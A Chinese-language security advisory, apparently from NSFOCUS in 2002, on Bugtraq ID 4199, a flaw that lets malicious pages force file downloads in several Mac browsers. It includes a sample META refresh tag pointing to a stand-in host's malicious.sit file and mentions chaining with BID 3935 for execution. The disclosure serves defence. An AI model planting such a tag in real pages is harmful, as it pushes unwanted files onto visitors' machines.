发布日期：2002-02-27
更新日期：2002-03-07

受影响系统：

Microsoft Internet Explorer 5.0 for Macintosh
Microsoft Internet Explorer 4.5 Mac / MRJ 2.2
Microsoft Internet Explorer 4.5 Mac / MRJ 2.1.4
Microsoft Internet Explorer 4.5 for Macintosh
Netscape Netscape 4.78 Mac
Netscape Netscape 4.77 Mac
Opera Software Opera Web Browser 5.0 Mac
iCab Company iCab 2.71
iCab Company iCab 2.7
Omni Group OmniWeb 4.1beta11
Omni Group OmniWeb 4.0.6

描述：

---

BUGTRAQ  ID: 4199

MacOS和MacOS X上的多种浏览器访问恶意页面时，可能自动下载任意文件。

比如所访问页面含有如下内容时

<META HTTP-EQUIV="refresh" CONTENT="1;URL=http://foo.com/malicious.sit">

该漏洞导致可以下载任意文件到一个已知目录，比如缺省下载目录，结合BID 3935的漏洞，"Apple MacOS Internet Explorer File Execution Vulnerability"，会严重危及客户机安全。

<*来源：vm_converter （vm_converter@mac.com）
  
  链接：http://archives.neohapsis.com/archives/bugtraq/2002-02/0310.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

vm_converter （vm_converter@mac.com）提供了如下测试页面：

http://www.u-struct.com/diary/img/20020131_OSissue_E/

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 不要用有问题的浏览器访问不可信站点。

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/windows/ie/default.asp

Netscape
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.netscape.com

Opera Software
--------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.opera.com

浏览次数：3565
严重程度：0（网友投票）